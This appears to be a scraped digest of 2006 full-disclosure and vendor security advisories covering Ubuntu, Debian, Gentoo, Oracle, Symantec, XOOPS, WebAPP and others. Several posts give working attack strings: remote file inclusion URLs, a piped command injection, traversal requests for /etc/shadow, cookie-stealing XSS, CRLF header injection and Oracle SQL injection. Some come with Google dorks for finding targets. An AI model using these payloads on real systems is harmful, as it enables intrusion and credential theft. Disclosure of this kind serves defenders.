hack.lu Bluetooth demo
As requested by several of the folks that went to hack.lu - 2006 I have posted the code for the 'GenerationTwo' InqTana variant at http://www.digitalmunition.com/hacklu.html For those that missed it Thierry Zoller of nruns demonstrated a remote exploitation of CVE-2005-1333 as a means to compromise both a Bluetooth enabled 10.3.9 Macintosh (that has not been patched to APPLE-SA-2005-03-21 and APPLE-SA-2005-05-03) and anything that it was paired with. The variant also works on 10.4 machines that have not been patched with the Mac OS X 10.4.1 and Mac OS X 10.4.7 Updates. Post-compromise the 'GenerationTwo' variant installs a malicious /etc/ttys file with a login getty listening on a Bluetooth rfcomm channel. A user is added and a setuid backdoor is left behind for easy root access over a Bluetooth rfcomm connection. The final steps of exploitation invole the harvesting of any available link keys (via KeyHarvest.pl) from blued.plist so that other devices may also be exploited. Much thanks to both Thierry Zoller and the organizers of Hack.lu. If you have any questions about GenerationTwo feel free to ask. Please keep in mind that CVE-2005-1333 was patched almost one and a half years ago at this point so I would say that you SHOULD be patched to this by now. If you are pen-testing older Macs make sure you check for Bluetooth! -KF
[USN-368-1] Qt vulnerability
=== Ubuntu Security Notice USN-368-1 October 23, 2006 qt-x11-free vulnerability CVE-2006-4811 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: libqt3c102 3:3.3.3-7ubuntu3.1 libqt3c102-mt3:3.3.3-7ubuntu3.1 Ubuntu 5.10: libqt3-mt3:3.3.4-8ubuntu5.1 Ubuntu 6.06 LTS: libqt3-mt3:3.3.6-1ubuntu6.1 After a standard system upgrade you need to restart your Desktop session to effect the necessary changes. Details follow: An integer overflow was discovered in Qt's image loader. By processing a specially crafted image with an application that uses this library (like Konqueror), a remote attacker could exploit this to execute arbitrary code with the application's privileges. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.3-7ubuntu3.1.diff.gz Size/MD5:62291 8b599a01d2de39b073be2a0bdb8c6475 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.3-7ubuntu3.1.dsc Size/MD5: 1816 1fdc71e7378ad7c52f29fde182246d2f http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.3.orig.tar.gz Size/MD5: 17358091 b0b98c938851d42a90632b990dca28c0 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-i18n_3.3.3-7ubuntu3.1_all.deb Size/MD5:78412 3ea93ae55002054c58a4dc90f51329be http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt3-doc_3.3.3-7ubuntu3.1_all.deb Size/MD5: 5421764 68991f2833c99bd70c3c6a190ff0a6d9 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-examples_3.3.3-7ubuntu3.1_all.deb Size/MD5: 1552090 6e9316cd2766bcfbaeabc55b3445ad56 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.3-7ubuntu3.1_amd64.deb Size/MD5:33004 eefa43c5e3b24370a383a51b36727368 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-dev_3.3.3-7ubuntu3.1_amd64.deb Size/MD5:3 90e34db6cd69cde1e965e13cb55d5810 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-headers_3.3.3-7ubuntu3.1_amd64.deb Size/MD5: 348742 a952c8e7e1a2988b2621fb723404d47a http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.3-7ubuntu3.1_amd64.deb Size/MD5:44636 d3c926f39dcb2b932326bab7106859a8 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3c102-mt-mysql_3.3.3-7ubuntu3.1_amd64.deb Size/MD5:45944 f3ed38fff143739feb15fc57c549b35a http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-mt-odbc_3.3.3-7ubuntu3.1_amd64.deb Size/MD5:63988 54ff31515fe216ef4d157b4213584a12 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3c102-mt-psql_3.3.3-7ubuntu3.1_amd64.deb Size/MD5:52248 84314a527126a99fb5d4485ca17aeb63 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-mt-sqlite_3.3.3-7ubuntu3.1_amd64.deb Size/MD5: 216308 41ae0886649734a7bbf05c9b40b6da44 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3c102-mt_3.3.3-7ubuntu3.1_amd64.deb Size/MD5: 3110106 3b3d79bfb5e2a9fb6a05771cfeb13078 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-mysql_3.3.3-7ubuntu3.1_amd64.deb Size/MD5:46056 75efaa38e659b6f640ba1d937124792d http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-odbc_3.3.3-7ubuntu3.1_amd64.deb Size/MD5:64116 1a2c666f5ee47c8b3d485a07b2ed4e26 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-psql_3.3.3-7ubuntu3.1_amd64.deb Size/MD5:52382 0633242d929de9b60a1620e5489f40d2 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-sqlite_3.3.3-7ubuntu3.1_amd64.deb Size/MD5: 216424 44cd04f2b0d0d6d07c1fa69c3177c2f6 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3c102_3.3.3-7ubuntu3.1_amd64.deb Size/MD5: 2996422 36942b9d4853b966ea2746ebaa091ab0 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt3-apps-dev_3.3.3-7ubuntu3.1_amd64.deb Size/MD5: 2114746 2d8a767cfcd05c4de97e06f962b48890 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-assistant_3.3.3-7ubuntu3.1_amd64.deb Size/MD5: 246458 133a70053ae29a1647565396adbaf415 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-de
Various Cross-Site-Scripting Vulnerabilities in Oracle Reports
NameVarious Cross-Site-Scripting Vulnerabilities in Oracle Reports [REP01], [REP02] SeverityLow Risk CategoryCross Site Scripting (CSS/XSS) Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Date 18 July 2006 (V 1.0) Advisory http://www.red-database-security.com/advisory/oracle_reports_css.html Details ### The Oracle Reports parameters showenv [REP01], parsequery [REP01], cellwrapper [REP02] and delimiter [REP02] are vulnerable against Cross-Site-Scripting. Affected Products # Internet Application Server Oracle Application Server Oracle Developer Suite Patch Information # Apply Oracle Critical Patch Update October 2006 (CPU July 2006). History ### 28-aug-2003 Oracle secalert was informed 29-aug-2003 Bug confirmed 17-oct-2006 Oracle published CPU October 2006 18-oct-2006 Red-Database-Security published this advisory Additional Information ## An analysis of the Oracle CPU Oct 2006 is available here http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html
[ GLSA 200610-09 ] libmusicbrainz: Multiple buffer overflows
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200610-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libmusicbrainz: Multiple buffer overflows Date: October 22, 2006 Bugs: #144089 ID: 200610-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple buffer overflows have been found in libmusicbrainz, which could lead to a Denial of Service or possibly the execution of arbitrary code. Background == libmusicbrainz is a client library used to access MusicBrainz music meta data. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-libs/musicbrainz < 2.1.4 >= 2.1.4 Description === Luigi Auriemma reported a possible buffer overflow in the MBHttp::Download function of lib/http.cpp as well as several possible buffer overflows in lib/rdfparse.c. Impact == A remote attacker could be able to execute arbitrary code or cause Denial of Service by making use of an overly long "Location" header in an HTTP redirect message from a malicious server or a long URL in malicious RDF feeds. Workaround == There is no known workaround at this time. Resolution == All libmusicbrainz users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/musicbrainz-2.1.4" References == [ 1 ] CVE-2006-4197 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4197 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200610-09.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
http://www.red-database-security.com/advisory/oracle_apex_css_notification_msg.html
Cross-Site-Scripting Vulnerabilitiy in Oracle APEX NOTIFICATION_MSG Name Cross-Site-Scripting Vulnerabilitiy in Oracle APEX NOTIFICATION_MSG Systems AffectedOracle APEX/HTMLDB SeverityMedium Risk CategoryCross Site Scripting (XSS/CSS) Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Date 18 October 2006 (V 1.00) Advisory http://www.red-database-security.com/advisory/oracle_apex_css_notification_msg.html Details ### The parameter NOTIFCATION_MSG parameter contains a cross site scripting vulnerability. Affected Products # Oracle APEX/HTMLDB < 2.2.1 Patch Information # This bug is fixed with the patch 2.2.1 of APEX which is not part of the Critical Patch Update October 2006. It's necessary to upgrade your APEX/HTMLDB installation to 2.2.1. Patches are currently not available for Oracle Application Express. History ### 03-oct-2005 Oracle secalert was informed 04-oct-2005 Bug confirmed 17-oct-2006 Oracle published CPU October 2006 18-oct-2006 Red-Database-Security published this advisory Additional Information ## An analysis of the Oracle CPU Oct 2006 is available here http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html
RMSOFT Cross Site Scripting
Cross Site Scripting In RMSOFT [Catalogo de Imagenes] URL: modules/rmgs/images.php?kw=alert(document.cookie)&q=search Google Dork: allinurl: /modules/rmgs/ Potenciado for XOOPS All Versions Greetz: _ANtrAX_,HANOWARS,4UREV01R & WWW.C-GROUP.ORG
trawler <= 1.8.1 Remote File Inclusion
# # trawler <= 1.8.1 Remote File Inclusion # Download Source : http://harald-kampen.de/trawler1.8.1.zip # # Found By: k1tk4t - k1tk4t[4t]newhack.org # Location: Indonesia -- #newhack[dot]org @irc.dal.net exploit; http://localhost/_msdazu_pdata/redaktion/artikel/up/index.php?path_red2=http://shell http://localhost/_msdazu_share/richtext/addtort.php?path_red2=http://shell http://localhost/_msdazu_share/richtext/colorpik2.php?path_red2=http://shell http://localhost/_msdazu_share/richtext/colorpik3.php?path_red2=http://shell http://localhost/_msdazu_share/richtext/extras_menu.php?path_red2=http://shell http://localhost/_msdazu_share/richtext/farbpalette.php?path_red2=http://shell http://localhost/_msdazu_share/richtext/lese_inc.php?path_red2=http://shell http://localhost/_msdazu_share/richtext/newfile.php?path_red2=http://shell http://localhost/_msdazu_share/share/insert1.php?path_scr_dat2=http://shell http://localhost/_msdazu_share/extras/downloads/index.php?path_red=http://shell and many more bug in this packet trawler ver 1.8.1 <-- :( this packet is openbug Thanks; str0ke xoron [www.xoron.biz] [mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159 evilcode,illibero,NoGe,nyubi,x-ace,ghoz, home_edition2001,matdhule,iFX, and for all(friend's&enemy) @irc.dal.net #newhack[dot]org [all member&staff] #e-c-h-o [all member echo community] #nyubicrew [all member solpotcrew community] #asiahacker [all member asiahacker community]
Symantec Product Security: Symantec Device Driver Elevation of Privileg
Symantec Product Security Advisory October 23, 2006 SYM06-022 Symantec Device Driver Elevation of Privilege Risk Impact: Medium Remote Access: No Local Access: Yes Authentication Required: Yes Exploit available: No Overview Symantec was notified of a vulnerability in a device driver which, if successfully exploited, could allow a local attacker to execute arbitrary code with elevated privileges or to crash the system. Affected Products Symantec AntiVirus Corporate Edition 8.1 Symantec AntiVirus Corporate Edition 9.0.3 and earlier Symantec Client Security 1.1 Symantec Client Security 2.0.3 and earlier Unaffected Products Symantec AntiVirus Corporate Edition 8.1.1 MR9 Symantec AntiVirus Corporate Edition 9.0.4 and later Symantec AntiVirus Corporate Edition 10.x Symantec Client Security 3.x Norton AntiVirus 2005 and later Norton Internet Security 2005 and later Norton System Works 2005 and later Details Boon Seng Lim notified Symantec of a vulnerability in SAVRT.SYS which could allow a malicious user to use the output buffer of DeviceIOControl()to overwrite kernel addresses because the address space of the output buffer was not properly validated. A successful exploit could potentially allow a local attacker to execute code of their choice with elevated privileges, or to crash the system. Symantec Response Symantec engineers verified that this issue exists in the affted products list above, and have released updates for currently supported affected products. Symantec is not aware of any customers impacted by this issue, or of any attempts to exploit the issue. Any future updates to this adivsory will be posted in the Symantec Advisory: http://www.symantec.com/avcenter/security/Content/2006.10.23.html Credit Symantec would like to thank Boon Seng Lim for reporting this issue, and working with us on the resolution. CVE This issue is a candidate for inclusion in the Common Vulnerabilities and Exposures (CVE) list (http://cve.mitre.org), which standardizes names for security problems. The CVE initiative has assigned CVE-2006-3455 to this issue
[SECURITY] [DSA 1198-1] New python2.3 packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1198-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff October 23rd, 2006 http://www.debian.org/security/faq - -- Package: python2.3 Vulnerability : buffer overflow Problem-Type : local(remote) Debian-specific: no CVE ID : CVE-2006-4980 Debian Bug : 391589 Benjamin C. Wiley Sittler discovered that the repr() of the Python interpreter allocates insufficient memory when parsing UCS-4 Unicode strings, which might lead to execution of arbitrary code through a buffer overflow. For the stable distribution (sarge) this problem has been fixed in version 2.3.5-3sarge2. Due to build problems this update lacks fixed packages for the Alpha and Sparc architectures. Once they are sorted out, fixed binaries will be released. For the unstable distribution (sid) this problem has been fixed in version 2.3.5-16. We recommend that you upgrade your Python 2.3 packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2.dsc Size/MD5 checksum: 1146 c38d235942cfb8afc2a134095983fcc3 http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2.diff.gz Size/MD5 checksum: 2352797 40d9ed18456b48d968a245de572090f6 http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5.orig.tar.gz Size/MD5 checksum: 8512566 9c35e5ca3c487e1c1f70f2fb1ccbfffe Architecture independent components: http://security.debian.org/pool/updates/main/p/python2.3/idle-python2.3_2.3.5-3sarge2_all.deb Size/MD5 checksum: 235662 ad56ea2b6e7020e58cca9d3a8119ad94 http://security.debian.org/pool/updates/main/p/python2.3/python2.3-doc_2.3.5-3sarge2_all.deb Size/MD5 checksum: 2860658 beb68a0918006c0b8435429bdf679af6 http://security.debian.org/pool/updates/main/p/python2.3/python2.3-examples_2.3.5-3sarge2_all.deb Size/MD5 checksum: 513034 38a28c4550fc4a8690e4d9a70f2c9029 AMD64 architecture: http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2_amd64.deb Size/MD5 checksum: 3036816 7b448a5a3461e36baabefc85293ef617 http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge2_amd64.deb Size/MD5 checksum: 1593430 36c9298f302d09612c2739723d2c2631 http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge2_amd64.deb Size/MD5 checksum:27150 cc6f50422763cb7e5181f44a9f9f454f http://security.debian.org/pool/updates/main/p/python2.3/python2.3-mpz_2.3.5-3sarge2_amd64.deb Size/MD5 checksum:31950 06361f2059f7086e0d31641720ce689f http://security.debian.org/pool/updates/main/p/python2.3/python2.3-tk_2.3.5-3sarge2_amd64.deb Size/MD5 checksum: 109784 273a79d36da2b54ccc79aeb84ff4c5a2 ARM architecture: http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2_arm.deb Size/MD5 checksum: 2879682 5599d0414d3b126c4bfa9e6f767f6b68 http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge2_arm.deb Size/MD5 checksum: 1647266 8ea66e2fef0442ae83b6ed65553494ad http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge2_arm.deb Size/MD5 checksum:26630 36ba9ad6e492d47a65052d645ba01aaa http://security.debian.org/pool/updates/main/p/python2.3/python2.3-mpz_2.3.5-3sarge2_arm.deb Size/MD5 checksum:30356 3037b21cb0196e315d5a97ca211f9f87 http://security.debian.org/pool/updates/main/p/python2.3/python2.3-tk_2.3.5-3sarge2_arm.deb Size/MD5 checksum: 107538 86fa9c7568a36645d532812da7dcb419 HP Precision architecture: http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2_hppa.deb Size/MD5 checksum: 3330806 447ead4cd77babc3f8284b9092e211b3 http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge2_hppa.deb Size/MD5 checksum: 1829560 0714c0d2161c2e91e6a351efb67d10dc http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge2_hppa.deb Size/MD5 checksum:28092 1450042d3e4a8eca1625bacb98c7de17 ht
WikiNi Multiple Cross Site Scripting Vulnerabilities
Hi, I've found 2 XSS vulns in WikiNi. The programmers have been contacted and the vulns addressed in version 0.4.4. The name parameter of page wakka.php is not properly sanitized: http://www.example.com/wakka.php";> The email parameter of page wakka.php is not properly sanitized: http://www.example.com/wakka.php";> Original advisory: http://zone14.free.fr/advisories/6/ --Raphael HUCK
Application orders Linux in WebAPP v0.9.9.2.1
By b0rizQ Dork : inurl:"apage/apage.cgi OR powered by WebAPP v0.9.9.2.1 File : apage.cgi Exploits : http://www.exemple.com/cgi-bin/mods/apage/apage.cgi?f=training.htm.|pwd|
Multiple HTTP response splitting vulnerabilities in SHOP-SCRIPT
Vendor: Shop-Script (a division of WebAsyst LLC) Application: Shop-Script (www.shop-script.com) I. Descriptions: Shop-Script is a PHP based shopping cart. Multiple links of shop-script are vulnerable to a new form of application attack technique called HTTP Response splitting (aka CRLF Injection). HTTP Response Splitting enables an attacker to alter the HTTP response header structure which can leads to various range of attacks such as web cache poisoning, temporary defacement, hijacking pages or cross-site scripting (XSS). This happens since the user input is injected into the value section of http header without properly escaping/removing CRLF characters which can leads to two HTTP responses instead of one response. II. Affected Links: POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?news=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?search_with_change_category_ability=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?logging=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?feedback=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?show_price=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?register=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?answer=%0d%0aFakeHeader:Fake_Custom_Header&save_voting_results=yes HTTP/1.0 POST /premium/index.php?productID=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 POST /premium/index.php?searchstring=&inside=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 III. Proof-of-concept: [Request Header] POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.shop-script-demo.com Content-Length: 18 Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa Connection: Close Pragma: no-cache current_currency=1 [Response Header] HTTP/1.1 302 Found Date: Mon, 16 Oct 2006 17:39:57 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: index.php?links_exchange= FakeHeader:Fake_Custom_Header <= [Custome remsponse injected by the attacker] Content-Length: 0 Connection: close Content-Type: text/html IV. Remediation: Sanitize CR(0x13) and LF(0x10) from the user input or properly encode the output in order to prevent the injection of custom HTTP headers. V. Reference: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html VI. Credits: Debasis Mohanty (aka Tr0y) www.hackingspirits.com For more vulnerabilities visit - http://hackingspirits.com/vuln-rnd/vuln-rnd.html
Re: [Full-disclosure] hack.lu Bluetooth demo
Dear List, Thanks Kevin for all your time and commitment :) Slides of the talk (Hack.lu) : http://secdev.zoller.lu/research/hack_lu_2006.pdf Bluetooth_Cracker : http://secdev.zoller.lu/research/bluetoothcracker.htm -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7
SQL Injection in Oracle package MDSYS.SDO_LRS
Name SQL Injection in package MDSYS.SDO_LRS (7569081) [DB13]
Systems AffectedOracle 9i Rel. 2
SeverityHigh Risk
CategorySQL Injection
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
Advisory18 October 2006 (V 1.00)
Advisory
http://www.red-database-security.com/advisory/oracle_sql_injection_sdo_lrs.html
Details
###
The package MDSYS.SDO_LRS contains a SQL injection vulnerability in the first
parameter of convert_to_lrs_layer. Oracle forgot to fix this problem with the
April CPU. Oracle fixed these vulnerabilities with the package DBMS_ASSERT. To
exploit this vulnerability it is necessary to have the privilege to create a
PL/SQL-function.
Sample
##
After running the following SQL statement
select sdo_lrs.convert_to_lrs_layer('"'' or 5=5--''"','RDS','A',1,1,1,1)
from dual;
The following SQL statement will be executed by Oracle:
SELECT COUNT(*) FROM USER_SDO_INDEX_INFO WHERE TABLE_NAME = '"' OR 5=5--'"'
AND COLUMN_NAME = 'RDS'
Patch Information
#
Apply the patches for Oracle CPU October 2006.
History
###
19-apr-2006 Oracle secalert was informed
18-oct-2006 Oracle published CPU October 2006 [DB13]
18-oct-2006 Advisory published
Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html
SQL Injection in package SYS.DBMS_CDC_IMPDP
NameSQL Injection in package SYS.DBMS_CDC_IMPDP [DB04] Systems AffectedOracle 10g SeverityHigh Risk CategorySQL Injection Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Advisory18 October 2006 (V 1.00) Advisory http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_cdc_impdp2.html Details ### The package SYS.DBMS_CDC_IMPDP contains SQL injection vulnerabilities. Oracle fixed this by using dbms_assert. Patch Information # Apply the patches for Oracle CPU October 2006. History ### 1-nov-2005 Oracle secalert was informed . 18-oct-2006 Oracle published CPU October 2006 [DB04] 18-oct-2006 Advisory published Additional Information ## An analysis of the Oracle CPU Oct 2006 is available here http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html
INCA IM-204 Dsl several vulnerabilities
INCA IM-204 Dsl several vulnerabilities Found By Crackers_Child [EMAIL PROTECTED] == Directory transversal http://192.168.1.1/cgi-bin/webcm?getpage=/./././././././etc/passwd http://192.168.1.1/cgi-bin/webcm?getpage=/./././././././etc/shadow http://192.168.1.1/cgi-bin/webcm?getpage=/./././././././etc/config.xml Greetz X_Alperen_X and All SiberSavascilar.Com !
SQL Injection in package XDB.DBMS_XDBZ0
Name SQL Injection in package XDB.DBMS_XDBZ0 [DB01]/[DB15] Systems AffectedOracle 9i Rel.2 - 10g Rel. 2 SeverityHigh Risk CategorySQL Injection Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Advisory18 October 2006 (V 1.00) Advisory http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_xdbz0.html Details ### The package XDB.DBMS_XDBZ0 contains SQL injection vulnerabilities in the procedure enable_hierarchy_internal [DB01], disable_hierarchiy_internal [DB15]. Oracle fixed this problem by using bind variables and verifying table names. Patch Information # Apply the patches for Oracle CPU October 2006. History ### 1-nov-2005 Oracle secalert was informed about both bugs. 18-oct-2006 Oracle published CPU October 2006 [DB01], [DB15] 18-oct-2006 Advisory published Additional Information ## An analysis of the Oracle CPU Oct 2006 is available here http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html
Cross-Site-Scripting Vulnerability in Oracle APEX WWV_FLOW_ITEM_HELP
Name Cross-Site-Scripting Vulnerability in Oracle APEX WWV_FLOW_ITEM_HELP Systems AffectedOracle APEX/HTMLDB SeverityMedium Risk CategoryCross Site Scripting (XSS/CSS) Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Date 18 October 2006 (V 1.00) Advisory http://www.red-database-security.com/advisory/oracle_apex_css_wwv_flow_item_help.html Details ### The package WWV_FLOW_ITEM_HELP contains a cross site scripting vulnerability. Affected Products # Oracle APEX/HTMLDB < 2.2.1 Patch Information # This bug is fixed with the patch 2.2.1 of APEX which is not part of the Critical Patch Update October 2006. It's necessary to upgrade your APEX/HTMLDB installation to 2.2.1. Patches are currently not available for Oracle Application Express. History ### 03-oct-2005 Oracle secalert was informed 04-oct-2005 Bug confirmed 17-oct-2006 Oracle published CPU October 2006 18-oct-2006 Red-Database-Security published this advisory Additional Information ## An analysis of the Oracle CPU Oct 2006 is available here http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html
SQL Injection Vulnerability in Oracle WWV_FLOW_UTILITIES
### NameSQL Injection Vulnerability in Oracle WWV_FLOW_UTILITIES Systems Affected Oracle APEX/HTMLDB SeverityHigh Risk CategorySQL Injection Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Date 18 October 2006 (V 1.00) Advisory http://www.red-database-security.com/advisory/oracle_apex_sql_injection_wwv_flow_utilities.html Details ### The list of values (LOV) in wwv_flow_utilities.gen_popup_list contains a SQL injection vulnerability. Depending of the APEX application it is possible to inject custom SQL statements. The entire SQL statement is accessible from the URL in the parameter P_LOV. To protect the SELECT statement in the URL Oracle is using a MD5 checksum. By modifying the SQL statement and recalculating the MD5 checksum P_LOV_CHECKSUM it is possible to run custom SQL statements from the URL. Sample URL: http://apex:/pls/htmldb/wwv_flow_utilities.gen_popup_list?p_filter=&p_name=p_t02&p_element_index=1&p_hidden_elem_name=p_t01&p_form_index=0&p_max_elements=&p_escape_html=&p_ok_to_query=YES&p_flow_id=100&p_page_id=11&p_session_id=15108399238201864297&p_eval_value=&p_return_key=YES&p_translation=N&p_lov=select%20cust_last_name%20||%20'%2C%20'%20||%20cust_first_name%20d%2C%20customer_id%20r%20from%20demo_customers%20order%20by%20cust_last_name&p_lov_checksum=82C7EFB6FA3A2FA2C6E1A70FB63BB064 Affected Products # This bug is fixed with 2.2 of APEX which is not part of the Critical Patch Update October 2006. It's necessary to upgrade your APEX/HTMLDB installation to 2.2 or better 2.2.1. Patches are currently not available for Oracle Application Express. Patch Information # This bug is fixed with Apex 2.2 or higher. History ### 03-oct-2005 Oracle secalert was informed 04-oct-2005 Bug confirmed 17-oct-2006 Oracle published CPU October 2006 and recommends to update to 2.2.1 18-oct-2006 Red-Database-Security published this advisory Additional Information ## An analysis of the Oracle CPU Oct 2006 is available here http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html
Smarty-2.6.1 Remote File Include Vulnerabilities
!WWW.SiBERSAVASCiLAR.COM! Title : Smarty-2.6.1 Remote File Include Vulnerabilities #Author: Crackers_Child [EMAIL PROTECTED]: [EMAIL PROTECTED] - --- Application Download : http://smarty.php.net/do_download.php?download_file=Smarty-2.6.14.tar.gz Bug İn test_cases.php http://www.site.com/Smarty-2.6.14/unit_test/test_cases.php?SMARTY_DIR=Sh3ll? greets: X_ALPEREN_X and All SiberSavascilar.CoM Members ! - [ WWW.SiBERSAVASCiLAR.COM ] --
Flaw in Firefox 2.0 Final
This flaw reported by Mozilla http://www.mozilla.org/security/announce/2006/mfsa2006-59.html is still unfixed in the latest Firefox 2.0 final. This exploit works in Firefox 2.0 Final: http://lcamtuf.coredump.cx/ffoxdie.html "Jonathan Watt and Michal Zalewski independently reported timing dependent testcases that trigger crashes at the same place during text display. We have seen no demonstration that these crashes could be reliably exploited, but they do show evidence of memory corruption so we presume they could be. Note: Thunderbird shares the browser engine with Firefox and could be vulnerable if JavaScript were to be enabled in mail. This is not the default setting and we strongly discourage users from enabling JavaScript in mail."
D-Link DSL-G624T several vulnerabilities
